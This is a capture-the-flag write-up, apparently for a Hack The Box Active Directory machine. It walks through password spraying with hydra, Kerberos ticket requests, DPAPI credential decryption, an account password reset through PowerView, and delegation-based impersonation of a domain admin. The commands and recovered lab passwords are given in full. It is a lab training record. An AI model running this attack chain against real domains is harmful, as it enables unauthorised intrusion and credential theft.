P.Rosa:Rosaisbest123

 

C.Neri user

 

The only thing we can access with P.Rosa was ldapsearch which had nothing useful. Everything else was a dead end so I resulted in password spraying.

 

Got password via password spraying.

I got the password policy from ldapsearch which shows that the minimum password length was 7 characters so I could create a custom rockyou.txt file and have all passwords be a minimum of 7 characters. Turns out this was the unattended way.

 

hydra -L test.txt ldap3://10.10.11.45 -P rockyou_passwords.txt -t 50 -I

login: [email protected]   password: Zer0the0ne

 

 

 

Machine doesnt allow ntlm auth so we have to use kerberos

 

 

Get a TGT ticket using the username/password above

impacket-getTGT vintage.htb/[email protected]

export [email protected] 

 

 

Need to setup our krb5 file for evil-winrm

└─$ cat /etc/krb5.conf      

[libdefaults]
   default_realm = VINTAGE.HTB

[realms]
   VINTAGE.HTB = {
       kdc = dc01.vintage.htb
   }

[domain_realm]
   .vintage.htb = VINTAGE.HTB
   vintage.htb = VINTAGE.HTB
 

 

evil-winrm -i dc01.vintage.htb -r vintage.htb

 

 

 

We can use dpapi to find the credentials for C.Neri_ADM

We need to copy the files from. In order to copy all the files we need to first base64 encode them

Files are located at

C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\ 

and 

C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\

 

certutil -encode <file name>

Then we can cat the file out which will give us base64, then we can copy the base64 to our machine and decrypt it to get the actual file contents.

 

 

Now I went through and setup a windows vm with mimikatz and tried decrypting them but it failed. I later found out mimikatz has a dpapi module and it decrypted them with two commands.

 

Get masterkey

impacket-dpapi  masterkey -file "99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

 

Decrypt file with master key

file location - C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\

impacket-dpapi credential -file "C4BB96844A5C9DD45D5B6A9859252BA6" -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

 

vintage\c.neri_adm
Uncr4ck4bl3P4ssW0rd0312

 

 

Administrator

This next part of the machine took me 15+ hours. This was by far the hardest machine ive ever done.

 

 

Overview of the attack

C.Neri_Adm has write access over DelegatedAdmins

 

DelegatedAdmins can impersonate almost any user


 

 

 

We need to be able to add an SPN to a user. C.Neri has generic all over svc_sql

 

These are the commands we need to execute to get this done, I combined them all into one command to make it easier.  These commands will use C.Neri's credentials to change the password of svc_sql

$SecPassword = ConvertTo-SecureString 'Zer0the0ne' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('vintage\c.neri', $SecPassword); Import-Module ../PowerView.ps1; $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force; Set-DomainUserPassword -Identity svc_sql -AccountPassword $UserPassword -Credential $Cred
 

 

These commands will use c.neri_adm's credentials to add svc_sql to the DelegatedAdmins group.

$SecPassword = ConvertTo-SecureString 'Uncr4ck4bl3P4ssW0rd0312' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('vintage\c.neri_adm', $SecPassword); Add-DomainGroupMember -Identity 'DELEGATEDADMINS' -Members 'svc_sql' -Credential $Cred

 

We will also need to unlock svc_sql's account as its locked.

Enable-ADAccount -Identity svc_sql

 

We also need a TGT for svc_sql which we can now get since we have his password.

impacket-getTGT vintage.htb/[email protected]

 

With all of that done we can perform the attack, but we do have to be quick as there is a clean up script resetting everything we just did every few minutes.

 

Request for a TGT and impersonate L.BIANCHI_ADM a domain admin. Note - I tried the administrator user but it would not work so we have to use this against a domain admin

 

[email protected] getST.py -spn ldap/dc01.vintage.htb -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -no-pass -k vintage.htb/svc_sql

 

 

 

We can now confirm the ticket works with netexec

KRB5CCNAME=L.BIANCHI_ADM@[email protected] nxc ldap dc01.vintage.htb -u L.BIANCHI_ADM --use-kcache -k

 

 

And finally we can use the ticket to get a shell and get the flag.

 

KRB5CCNAME=L.BIANCHI_ADM@[email protected] impacket-wmiexec vintage.htb/[email protected] -k

 

 

 

I learned a ton of new things but this machine was extremely hard and pretty unstable.